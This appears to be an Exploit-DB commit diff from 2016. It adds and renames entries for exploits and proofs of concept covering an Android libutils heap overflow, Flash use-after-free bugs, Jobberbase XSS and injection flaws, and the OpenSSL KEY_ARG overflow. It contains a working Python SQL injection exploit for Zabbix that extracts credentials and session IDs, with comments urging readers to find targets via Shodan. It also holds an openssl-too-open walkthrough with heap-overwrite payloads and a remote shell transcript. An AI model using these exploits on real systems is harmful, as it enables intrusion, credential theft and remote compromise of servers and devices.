Zenoss 3.2.1 - Remote Authenticated Command Execution

Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution

Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution
Magento CE < 1.9.0.1 - Authenticated Remote Code Execution

Netsweeper 4.0.9 - Arbitrary File Upload and Execution
Netsweeper 4.0.9 - Arbitrary File Upload / Execution

Netsweeper 4.0.8 - Arbitrary File Upload and Execution
Netsweeper 4.0.8 - Arbitrary File Upload / Execution

EasyITSP - 'customers_edit.php' Authentication Security Bypass
EasyITSP - 'customers_edit.php' Authentication Bypass

Wolf CMS - Arbitrary File Upload and Execution
Wolf CMS - Arbitrary File Upload / Execution

Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow
Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow

GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)
GLPI 0.85.5 -  Arbitrary File Upload / Filter Bypass / Remote Code Execution

Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution
Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution

vBulletin 5.1.x - Pre-Authentication Remote Code Execution
vBulletin 5.1.x - Unauthenticated Remote Code Execution
WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass
WordPress WP to Twitter Plugin - Authorization Bypass
WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass
WordPress WP to Twitter Plugin - Authentication Bypass

Novell ServiceDesk - Authenticated File Upload
Novell ServiceDesk - Authenticated Arbitrary File Upload

Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload
Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload

Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)

phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers
phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers)
vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API
vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API
vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API
vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API

Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)

phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution
phpMyAdmin 4.6.2 - Authenticated Remote Code Execution

vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF)
vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)

ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass
ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass
This commit is contained in:
Offensive Security 2016-09-09 05:09:09 +00:00
parent 2aa9d941de
commit 0be1ea959a
15 changed files with 1745 additions and 1776 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

468
files.csv
View file

File diff suppressed because it is too large Load diff

160
platforms/android/remote/40354.txt Executable file
View file

@ -0,0 +1,160 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=840
There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8.
This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service "android.security.keystore" from a normal app context without any additional permissions. There are probably other routes to reach this code with attacker controlled data.
ssize_t utf16_to_utf8_length(const char16_t *src, size_t src_len)
{
if (src == NULL || src_len == 0) {
return -1;
}
size_t ret = 0;
const char16_t* const end = src + src_len;
while (src < end) {
if ((*src & 0xFC00) == 0xD800 && (src + 1) < end
&& (*++src & 0xFC00) == 0xDC00) { // <---- increment src here even if condition is false
// surrogate pairs are always 4 bytes.
ret += 4;
src++;
} else {
ret += utf32_codepoint_utf8_length((char32_t) *src++); // <---- increment src again
}
}
return ret;
}
void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst)
{
if (src == NULL || src_len == 0 || dst == NULL) {
return;
}
const char16_t* cur_utf16 = src;
const char16_t* const end_utf16 = src + src_len;
char *cur = dst;
while (cur_utf16 < end_utf16) {
char32_t utf32;
// surrogate pairs
if((*cur_utf16 & 0xFC00) == 0xD800 && (cur_utf16 + 1) < end_utf16
&& (*(cur_utf16 + 1) & 0xFC00) == 0xDC00) { // <---- no increment if condition is false
utf32 = (*cur_utf16++ - 0xD800) << 10;
utf32 |= *cur_utf16++ - 0xDC00;
utf32 += 0x10000;
} else {
utf32 = (char32_t) *cur_utf16++; // <---- increment src
}
const size_t len = utf32_codepoint_utf8_length(utf32);
utf32_codepoint_to_utf8((uint8_t*)cur, utf32, len);
cur += len;
}
*cur = '\0';
}
An example character sequence would be the following:
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
This will be processed by utf16_to_utf8_len like this:
first loop iteration:
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
^
invalid surrogate; skip at (*++src & 0xfc00 == 0xdc00)
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
^
invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
second loop iteration:
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
^
invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
And will be processed by utf16_to_utf8 like this:
first loop iteration:
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
^
invalid surrogate; write 0 length character to output
second loop iteration
\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
^
valid surrogate pair 0xd841 0xdc41; emit length 4 character to output
We can then construct a crash PoC using this sequence for the String16 passed to the keystore method 'getKeyCharacteristics' that will perform the String8(String16&) constructor on attacker supplied input; and provide a massive input string. The crash PoC should write 0x20000 * 2/3 bytes into a 2 byte heap allocation. It has been tested on a recent nexus5x userdebug build; resulting in the following crash (the object backing an android::vectorImpl has been corrupted by the overwrite, and "\xf0\xa0\x91\x81" is the utf8 encoding for the utf16 "\x41\xd8 \x41\xdc"):
pid: 16669, tid: 16669, name: keystore >>> /system/bin/keystore <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x91a0f08191a110
x0 8191a0f08191a108 x1 0000000000000000 x2 0000000000000000 x3 0000000000000020
x4 00000000ffffffa0 x5 0000000000000010 x6 0000000000000001 x7 0000007f802c0018
x8 0000000000000000 x9 000000000a7c5ac5 x10 0000000000000000 x11 0000000000000000
x12 000000000000d841 x13 0000000000000841 x14 0000000000000041 x15 0000007f8067bd9e
x16 0000005565984f08 x17 0000007f80aeee48 x18 00000000ffffff91 x19 0000007fd1de26c0
x20 8191a0f08191a108 x21 8191a0f08191a0f0 x22 0000000000000000 x23 0000005565984000
x24 8191a0f08191a0f0 x25 0000007fd1dea7b8 x26 0000007f806690e0 x27 0000007fd1de25d0
x28 000000556596f000 x29 0000007fd1de2550 x30 0000005565961188
sp 0000007fd1de2550 pc 0000007f80aeee58 pstate 0000000060000000
backtrace:
#00 pc 0000000000016e58 /system/lib64/libutils.so (_ZN7android10VectorImpl13editArrayImplEv+16)
#01 pc 000000000000a184 /system/bin/keystore
#02 pc 00000000000112d0 /system/bin/keystore
#03 pc 000000000000b7f4 /system/lib64/libkeystore_binder.so (_ZN7android17BnKeystoreService10onTransactEjRKNS_6ParcelEPS1_j+1560)
#04 pc 0000000000024c9c /system/lib64/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+168)
#05 pc 000000000002dd98 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+1240)
#06 pc 000000000002de4c /system/lib64/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+140)
#07 pc 000000000002def4 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+76)
#08 pc 0000000000007a04 /system/bin/keystore (main+1940)
#09 pc 000000000001bc98 /system/lib64/libc.so (__libc_init+100)
#10 pc 0000000000007c20 /system/bin/keystore
######################################################
Actually you can compromise many native system services using this bug (ie those not implemented in Java); because of the interface token checking code in Parcel.cpp. See attached for another PoC that takes as a first command line argument the name of the service to crash. On my nexus 5x with very unscientific testing, this includes the following services:
- phone, iphonesubinfo, isub (com.android.phone)
- telecom, voiceinteraction, backup, audio, location, notification, connectivity, wifi, network_management, statusbar, device_policy, mount, input_method, window, content, account, telephony.registry, user, package, batterystats (system_server)
- media.audio_policy, media.audio_flinger (mediaserver)
- drm.drmManager (drmserver)
- android.security.keystore (keystore)
- SurfaceFlinger (surfaceflinger)
bool Parcel::enforceInterface(const String16& interface,
IPCThreadState* threadState) const
{
int32_t strictPolicy = readInt32();
if (threadState == NULL) {
threadState = IPCThreadState::self();
}
if ((threadState->getLastTransactionBinderFlags() &
IBinder::FLAG_ONEWAY) != 0) {
// For one-way calls, the callee is running entirely
// disconnected from the caller, so disable StrictMode entirely.
// Not only does disk/network usage not impact the caller, but
// there's no way to commuicate back any violations anyway.
threadState->setStrictModePolicy(0);
} else {
threadState->setStrictModePolicy(strictPolicy);
}
const String16 str(readString16());
if (str == interface) {
return true;
} else {
ALOGW("**** enforceInterface() expected '%s' but read '%s'",
String8(interface).string(), String8(str).string());
return false;
}
}
Proofs of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip

32
platforms/multiple/dos/40355.txt Executable file
View file

@ -0,0 +1,32 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
A minimal PoC is as follows:
this.createEmptyMovieClip( "mc", 1);
var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
var t:Transform = new Transform( mc );
t.colorTransform = c;
this.createTextField( "tf", 2, 0, 0, 2000, 200);
var ct = ColorTransform;
var g = flash.geom;
g.addProperty("ColorTransform", func, func);
var q = t.colorTransform;
tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
function func(){
mc.removeMovieClip();
return ct;
}
A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip

21
platforms/multiple/dos/40356.txt Executable file
View file

@ -0,0 +1,21 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.addProperty( "f", func, func );
mc.f("hello");
function func(){
mc.removeMovieClip();
// Fix heap
var d:Date = new Date();
return d.getDate;
}
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip

40
platforms/php/webapps/40351.txt Executable file
View file

@ -0,0 +1,40 @@
Jobberbase: http://www.jobberbase.com/
Version: 2.0
By Ross Marks: http://www.rossmarks.co.uk
1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>
2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there
3) reflect XSS in username - http://example.com/admin/
eg. "><script>alert(1)</script>
reflect XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/
4) persistant XSS on admin backend homepage
create a job and give the URL:
" onhover="alert(1)
persistant XSS - admin add to category name (no protection)
5) unrestricted file upload
upload CV accepts any filetype appends _ uniqueid() to filename
eg. "file.php" becomes "file_<uniqueid>.php"
uniquid in in insecure method for generating random sequences and is based on microtime
if the server is using an older version of PHP a null byte can be used
ie. "test.php%00.php" would be uploaded as "test.php"
6) code execution race condition:
if the admin has chosen to not store uploaded CV's
they are first moved from /tmp to the writable /upload directory before being unlinked
this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted
7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
days_behind parameter is vulnerable
** notes **
admin change password page don't need old password, no csrf token just a simple POST request.
admin password stored in md5 format unsalted
cookies do NOT have "secure" or "HTTPonly" flags enabled
no csrf anywhere

56
platforms/php/webapps/40353.py Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)
# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)
# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=20).read()
except Exception, msg:
print '\t\tOpps,an error occurs...',msg
else:
result_reg = re.compile(reg)
results = result_reg.findall(response)
print payload #Uncomment this to see details
if results:
return results[0]
def exploit(url,userid):
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
if(password):
print '[+]Username~Password : %s' % password
else:
print '[-]Get Password Failed'
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
if(session_id):
print "[+]Session_id%s" % session_id
else:
print "[-]Get Session id Failed"
print '\n'
def main():
print '=' * 70
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
print '\t\t Author:Zzzians(Zzzians@gmail.com)'
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
print '\t\t\t Time2016-08-20\n'
urls = ["http://10.15.5.86"]
ids = [1,2]
for url in urls:
if url[-1] != '/': url += '/'
print '='*25 + url + '='*25
for userid in ids:
exploit(url,userid)
main()

2
platforms/unix/remote/21671.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/5363/info
A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
@ -5,6 +6,7 @@ A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available.
*/
/*
* VERY PRIV8 spabam SPAX@zone-h.org

1303
platforms/unix/remote/21672.c
View file

File diff suppressed because it is too large Load diff

444
platforms/unix/remote/40347.txt Executable file
View file

@ -0,0 +1,444 @@
/*
* openssl-too-open.c - OpenSSL remote exploit
* Spawns a nobody/apache shell on Apache, root on other servers.
*
* by Solar Eclipse <solareclipse@phreedom.org>
*
* Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help.
*
* This code or any derivative versions of it may not be posted to Bugtraq
* or anywhere on SecurityFocus, Symantec or any affiliated site.
*
*/
---------[ ./openssl-too-open ]
openssl-too-open is a remote exploit for the KEY_ARG overflow in
OpenSSL 0.9.6d and older. It will give you a remote shell with the
priviledges of the server process (nobody when used against Apache,
root against other servers).
Only Linux/x86 targets are supported.
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
Examples: ./openssl-too-open -a 0x01 -v localhost
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80
---------[ ./openssl-scanner ]
openssl-scanner scans a number of hosts for vulnerable OpenSSL
implementations.
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
---------[ Screenshots ]
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
* Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
* Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
---------[ How Does openssl-too-open Work? ]
It is important to understand the SSL2 handshake in order to successfully
exploit the KEY_ARG vulnerability.
---/ Typical SSL2 Handshake
Client Server
CLIENT_HELLO -->
<-- SERVER_HELLO
CLIENT_MASTER_KEY -->
<-- SERVER_VERIFY
CLIENT_FINISHED -->
<-- SERVER_FINISHED
The CLIENT_HELLO message contains a list of the ciphers the client supports,
a session id and some challenge data. The session id is used if the client
wishes to reuse an already established session, otherwise it's empty.
The server replies with a SERVER_HELLO message, also listing all supported
ciphers and includes a certificate with its public RSA key. The server
also sends a connection id, which will later be used by the client to
verify that the encryption works.
The client generates a random master key, encrypts it with the server's
public key and sends it with a CLIENT_MASTER_KEY message. This message
also specifies the cipher selected by the client and a KEY_ARG field,
which meaning depends on the specified cipher. For DES-CBC ciphers, the
KEY_ARG contains the initialization vector.
Now both the client and the server have the master key and they can generate
the session keys from it. All messages from this point on are encrypted.
The server replies with a SERVER_VERIFY message, containing the challenge
data from the CLIENT_HELLO message. If the key exchange has been successful,
the client will be able to decrypt this message and the challenge data returned
from the server will match the challenge data sent by the client.
The client sends a CLIENT_FINISHED message with a copy of the connection id
from the SERVER_HELLO packet. It is now the server's turn to decrypt this
message and check if the connection id returned by the client matches the
connection it sent by the server.
Finally the server sends a SERVER_FINISHED message, completing the handshake.
This message contains a session id, generated by the server. If the client
wishes to reuse the session later, it can send this session id with the
CLIENT_HELLO message.
---/ The KEY_ARG Buffer Overflow
The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This
function reads a CLIENT_MASTER_KEY packet and processes it. It reads the
KEY_ARG_LENGTH value from the client and then copies that many bytes in an
array of a fixed size. This array is part of the SSL_SESSION structure.
If the client specifies a KEY_ARG longer than 8 bytes, the variables in the
SSL_SESSION structure can be overwritten with user supplied data.
Let's look at the definition of this structure.
typedef struct ssl_session_st
{
int ssl_version; /* what ssl version session info is
* being kept in here? */
/* only really used in SSLv2 */
unsigned int key_arg_length;
unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
int master_key_length;
unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
/* session_id - valid? */
unsigned int session_id_length;
unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
/* this is used to determine whether the session is being reused in
* the appropriate context. It is up to the application to set this,
* via SSL_new */
unsigned int sid_ctx_length;
unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
int not_resumable;
/* The cert is the certificate used to establish this connection */
struct sess_cert_st /* SESS_CERT */ *sess_cert;
/* This is the cert for the other end.
* On clients, it will be the same as sess_cert->peer_key->x509
* (the latter is not enough as sess_cert is not retained
* in the external representation of sessions, see ssl_asn1.c). */
X509 *peer;
/* when app_verify_callback accepts a session where the peer's certificate
* is not ok, we must remember the error for session reuse: */
long verify_result; /* only for servers */
int references;
long timeout;
long time;
int compress_meth; /* Need to lookup the method */
SSL_CIPHER *cipher;
unsigned long cipher_id; /* when ASN.1 loaded, this
* needs to be used to load
* the 'cipher' structure */
STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
CRYPTO_EX_DATA ex_data; /* application specific data */
/* These are used to make removal of session-ids more
* efficient and to implement a maximum cache size. */
struct ssl_session_st *prev,*next;
} SSL_SESSION;
It really looks better with VIM coloring. Anyway, we know the size of the
structure and it's allocated on the heap. The first thing that comes to
mind is to overwrite the next malloc chunk and then make the OpenSSL code
call free() on the SSL_SESSION structure.
After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet
from the server and then we'll respond with a CLIENT_FINISHED message.
The server uses this the contents of this message to verify that the
key exchange succeeded. If we return a wrong connection id, the server
will abort the connection and free the SSL_SESSION structure, which is
exactly what we want.
We'll overwrite the KEY_ARG array with 8 random bytes and the following
string:
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master_key_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
"AAAA" /* unsigned int session_id_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */
"AAAA" /* unsigned int sid_ctx_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
"AAAA" /* unsigned int sid_ctx_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
"AAAA" /* int not_resumable; */
"\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify_result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress_meth; */
"\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */
"AAAA" /* unsigned long cipher_id; */
"\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */
"AAAAAAAA" /* struct ssl_session_st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */
The "A" bytes don't affect the OpenSSL control flow. The other bytes must be
set to specific values to make the exploit work. For example, the peer and
sess_cert pointers must be NULL, because the SSL cleanup code will call
free() on them before it frees the SSL_SESSION structure.
The free() call will write the value of the bk pointer to the memory
address in the fd pointer + 12 bytes. We'll put our shellcode address
in the bk pointer and we'll write it to the free() entry in the GOT
table.
If you don't understand how freeing this malloc chunk overwrites the GOT
entry or don't know what the GOT table is, visit juliano's site at
http://community.core-sdi.com/~juliano/ and read some papers.
---/ Getting the Shellcode Address
There is only one little problem. We need a place to put our shellcode
and we need the exact shellcode address. The trick is to use the
SERVER_FINISHED message. This message includes the session id, which
is read from the SSL_SESSION structure. The server reads session_id_length
bytes from the session_id[] array and sends them to the client. We can
overwrite the session_id_length variable and complete the handshake.
If session_id_length is long enough, the SERVER_FINISHED message will
include the contents of the SSL_SESSION structure.
To get the contents of the session structure, we'll overwrite the
KEY_ARG array with 8 random bytes and the following string:
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master_key_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session_id_length; */
Now let's imagine the heap state when we send our connection request.
We have a heap, which contains some allocated chunks of memory and a
large 'top' chunk, covering all free memory.
When the server receives the connection, it forks a child and the child
allocates the SSL_SESSION structure. If there has not been a signifficant
malloc/free activity, the fragmentation of the memory will be low and the
new chunk will be allocated from the beginning of the 'top' chunk.
The next allocated chunk is a 16 bytes chunk which holds a
STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the
beginning of the 'top' chunk, so it's located right above the SSL_SESSION
structure. The address of this chunk is stored in the session->ciphers
variable.
If we're lucky, the memory would look like this:
| top chunk |
|-----------|
session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure
points here -> |-----------|
| 368 bytes | <- SSL_SESSION structure
|-----------|
We can read the session->ciphers pointer from the SSL_SESSION structure
in the SERVER_FINISHED message. By subtracting 368 from it, we'll get
the address of the SSL_SESSION structure, and thus the address of
the data we've overwritten.
---/ fork() Is Your Friend
We'll use the same buffer overflow to get the address of the shellcode
and to overwrite the malloc chunks. The problem is that we need to
know the shellcode address before we send it to the server.
The only solution is to send 2 requests. The first request overwrites
session_id_length and we complete the handshake to get the SERVER_FINISHED
message. Then we adjust our shellcode and open a second connection
which we use to send it.
If we're dealing with a forking server like Apache, the two children
will have an identical memory layout and malloc() will put the
session structure at the same address. Of course, life is never that
simple. Apache children can handle multiple requests, which would
change the memory allocation pattern of the two children we use.
To guarantee that both children are freshly spawned, our exploit
will open a number of connections to the server before sending the
two important requests. These connection should use up all available
Apache children and force new ones to be spawned.
